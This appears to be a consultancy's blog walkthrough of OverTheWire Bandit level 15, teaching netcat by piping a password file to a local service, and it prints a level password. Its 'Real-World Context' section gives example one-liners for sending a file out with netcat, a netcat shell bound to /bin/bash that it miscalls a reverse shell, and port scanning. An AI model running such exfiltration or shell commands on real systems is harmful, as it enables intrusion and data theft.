🌐 OverTheWire Bandit Level 15: Using netcat to Submit Passwords to Services

Level 15 introduces netcat—a powerful network utility for connecting to services and ports. Instead of finding a password file, you'll submit the current level's password to a service running on a specific port. This teaches you how network services work and how to interact with them programmatically.

Level 15 teaches you:

• Using netcat (or nc) to connect to network ports
• Submitting data to network services
• Understanding how services listen on ports
• Automating password submission with pipes
• Working with services that don't show prompts

This level builds on what you learned about localhost and introduces network services. Understanding netcat is essential for penetration testing, as you'll constantly need to interact with network services.

---

🎯 The Objective

After logging into bandit14, your goal is to find the password for Level 15. The password is retrieved by submitting the current level's password (bandit14) to a service running on port 30000 on localhost.

What Level 15 teaches:

• Using netcat to connect to network ports
• Submitting passwords to services
• Understanding port-based services
• Automating input with pipes
• Working with services that don't show prompts

The challenge: Connect to port 30000 on localhost using netcat, submit the bandit14 password, and receive the bandit15 password in response.

---

🔍 Understanding the Problem

Let's start by connecting to Level 14 and seeing what we're dealing with:

sshpass -p `cat bandit14` ssh bandit14@bandit.labs.overthewire.org -p 2220

Once connected, you need to:

1. Get the current level's password (bandit14)
2. Connect to port 30000 on localhost
3. Submit that password
4. Receive the next level's password

The problem: How do you connect to a network service and submit a password?

The answer: Use netcat (or nc) to connect to the port, then submit the password. You can do this manually or automate it with pipes.

---

🧠 Understanding netcat

Let's dive deeper into netcat, because it's incredibly useful:

What Is netcat?

netcat (often abbreviated as nc) is a network utility that:

• Connects to network ports
• Sends and receives data
• Acts as a simple client or server
• Useful for testing network services

Basic usage:

nc hostname port

What it does:

• Connects to the specified host and port
• Allows you to send data (type and press Enter)
• Receives data from the service
• Useful for interacting with network services

Why netcat Is Useful

netcat is useful for:

• Testing services — Check if ports are open
• Sending data — Submit information to services
• Receiving data — Get responses from services
• Network debugging — Troubleshoot network issues
• Penetration testing — Interact with services during assessments

Common netcat Options

Basic connection:

nc localhost 30000

With timeout:

nc -w 5 localhost 30000

Verbose mode:

nc -v localhost 30000

For Level 15: We use basic nc localhost 30000 to connect to the service.

---

📋 Step-by-Step Walkthrough

Step 1: Connect to Level 14

sshpass -p `cat bandit14` ssh bandit14@bandit.labs.overthewire.org -p 2220

Step 2: Get the Current Password

First, get the password for the current level (bandit14):

cat /etc/bandit_pass/bandit14

Copy this password—you'll need to submit it to the service.

Step 3: Connect to the Service

Connect to port 30000 on localhost using netcat:

nc localhost 30000

Important: When you press Enter, nothing will happen—there's no prompt or message. This is normal! The service is waiting for you to send the password.

Step 4: Submit the Password

Type the password you got from step 2 and press Enter. The service will process it and respond.

What you'll see: If the password is correct, you'll get a message saying "Correct!" followed by the password for Level 15.

Example output:

Correct!
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

Step 5: Save the Password

Copy the password and save it on your local machine:

On Linux/macOS:

echo "PASSWORD_HERE" > bandit15

On Windows (PowerShell):

"PASSWORD_HERE" | Out-File -FilePath bandit15 -NoNewline

Step 6: Connect to Level 15

sshpass -p `cat bandit15` ssh bandit15@bandit.labs.overthewire.org -p 2220

---

💡 Automating with Pipes

Instead of manually typing the password, you can automate it using pipes:

Method 1: Pipe Password Directly (Recommended)

cat /etc/bandit_pass/bandit14 | nc localhost 30000

Breaking this down:

• cat /etc/bandit_pass/bandit14 — Reads the password file
• | — Pipes the password to the next command
• nc localhost 30000 — Connects to the service and sends the piped password

What this does: Automatically sends the password to the service without you having to type it manually.

Output: You'll see the response from the service, including the password for Level 15.

Pros:

• Faster and more efficient
• No manual typing (reduces errors)
• Can be scripted
• Works well for automation

Method 2: Manual Entry

nc localhost 30000
# Then type the password manually and press Enter

Pros:

• Simple, no pipes needed
• Good for learning

Cons:

• Requires manual typing
• More error-prone
• Slower

For Level 15, use Method 1 — it's more efficient and teaches you valuable automation skills.

---

🛠️ Alternative Methods

Here are different ways to submit the password:

Method 1: Pipe Password (Recommended)

cat /etc/bandit_pass/bandit14 | nc localhost 30000

Pros: Fast, automated, no typing errors Cons: None really

Method 2: Manual Entry

nc localhost 30000
# Type password manually

Pros: Simple, good for learning Cons: Manual typing, error-prone

Method 3: Using echo

echo "PASSWORD_HERE" | nc localhost 30000

Pros: Explicit, can test with different passwords Cons: Requires knowing the password first

Method 4: Using printf

printf "PASSWORD_HERE\n" | nc localhost 30000

Pros: More control over formatting Cons: More complex syntax

For Level 15, use Method 1 — it's the most efficient and teaches you valuable skills.

---

🔒 Real-World Context

Why does this matter in penetration testing?

In real security assessments, you'll constantly use netcat to interact with services:

1. Service Testing

Testing if services are running and accessible:

• Check if ports are open
• Verify services respond
• Test service functionality

Example: Testing a service:

nc -v target.com 80
# Checks if port 80 is open

2. Password Submission

Many services accept passwords via network:

• Authentication services
• API endpoints
• Custom protocols
• CTF challenges

Example: Submitting credentials:

echo "username:password" | nc target.com 8080

3. Banner Grabbing

Collecting service information:

• Service versions
• Banner information
• Service identification

Example: Grabbing banners:

nc target.com 22
# Shows SSH banner

4. Data Exfiltration

Sending data through network connections:

• Exfiltrating files
• Sending commands
• Transferring data

Example: Sending data:

cat file.txt | nc target.com 4444

5. Port Forwarding

Creating network tunnels:

• Bypassing firewalls
• Accessing internal services
• Creating backdoors

Example: Creating a reverse shell:

nc -l -p 4444 -e /bin/bash

6. Network Debugging

Troubleshooting network issues:

• Testing connectivity
• Verifying ports
• Debugging protocols

Example: Testing connectivity:

nc -zv target.com 1-1000
# Scans ports 1-1000

The skill you're learning: How to interact with network services using netcat. This is essential when:

• Testing network services
• Submitting credentials
• Interacting with APIs
• Performing network reconnaissance
• Debugging network issues
• Working with custom protocols

---

🚨 Common Mistakes

Mistake 1: Expecting a Prompt

Wrong:

nc localhost 30000
# Waits... nothing happens, thinks it's broken

Right:

nc localhost 30000
# Nothing happens - this is normal! Just type the password

Why: Some services don't show prompts. They just wait for input. This is normal behavior—just send the password.

Mistake 2: Wrong Password

Wrong:

nc localhost 30000
# Types wrong password or current level password incorrectly

Right:

cat /etc/bandit_pass/bandit14 | nc localhost 30000
# Uses the correct password automatically

Why: Make sure you're using the password for the current level (bandit14), not a previous level. Piping from the password file ensures accuracy.

Mistake 3: Not Pressing Enter

Wrong:

nc localhost 30000
# Types password but doesn't press Enter

Right:

nc localhost 30000
# Types password AND presses Enter

Why: Services typically wait for a newline (Enter key) before processing input. Make sure to press Enter after typing the password.

Mistake 4: Wrong Port

Wrong:

nc localhost 3000
# Wrong port number

Right:

nc localhost 30000
# Correct port (30000, not 3000)

Why: Port numbers matter! Make sure you're connecting to the correct port (30000, not 3000 or 300).

Mistake 5: Not Understanding the Service

Confusion: "What is this service? What does it do?"

Clarification:

• The service on port 30000 is a password verification service
• It accepts the current level's password
• If correct, it returns the next level's password
• This is a common pattern in CTF challenges

For Level 15: Submit bandit14's password to get bandit15's password.

---

💻 Practice Exercise

Try these to reinforce what you learned:

1. Test netcat connection:

   nc -v localhost 30000
   # Verbose mode shows connection details
   

2. Pipe data to netcat:

   echo "test" | nc localhost 30000
   # Sends "test" to the service
   

3. Read password and pipe:

   cat /etc/bandit_pass/bandit14 | nc localhost 30000
   # Automates password submission
   

4. Test with timeout:

   echo "test" | nc -w 5 localhost 30000
   # 5 second timeout
   

---

🎓 Understanding Network Ports

This is a good time to understand network ports:

What Are Ports?

Ports are numbers that identify specific services:

• Range: 0-65535
• Well-known ports: 0-1023 (HTTP: 80, HTTPS: 443, SSH: 22)
• Registered ports: 1024-49151
• Dynamic ports: 49152-65535

Common Ports

• 22 — SSH
• 80 — HTTP
• 443 — HTTPS
• 30000 — Custom service (Level 15)

Why Ports Matter

Ports allow multiple services on one machine:

• Each service listens on a specific port
• Clients connect to that port
• Ports identify which service to use

For Level 15: Port 30000 is where the password verification service is running.

---

🔗 What's Next?

Level 16 introduces port scanning—a technique for discovering open ports and services. You'll learn to scan for open ports and identify what services are running, which is essential for network reconnaissance.

Before moving on, make sure you:

• ✅ Successfully used netcat to connect to port 30000
• ✅ Understand how to submit data to network services
• ✅ Can automate password submission with pipes
• ✅ Know that some services don't show prompts
• ✅ Understand what network ports are

---

📚 Key Takeaways

After completing Level 15, you should understand:

1. netcat (nc) — Network utility for connecting to ports and services
2. Port connections — Using nc hostname port to connect to services
3. Password submission — Sending passwords to network services
4. Pipes with netcat — Automating input using | to pipe data
5. No prompts — Some services don't show prompts, just wait for input

---

🎯 Quick Reference

Problem	Solution	Example
Connect to port	Use nc	nc localhost 30000
Submit password	Pipe to nc	cat password | nc localhost 30000
Test service	Use nc -v	nc -v localhost 30000
Set timeout	Use -w	nc -w 5 localhost 30000
Manual entry	Type after connect	nc localhost 30000 then type

---

Questions about Level 15 or using netcat? Reach out directly:

• Email: m1k3@msquarellc.net
• Phone: (559) 670-3159
• Schedule: Book a free consultation

---

M Square LLC
Cybersecurity | Penetration Testing | No-Nonsense Advice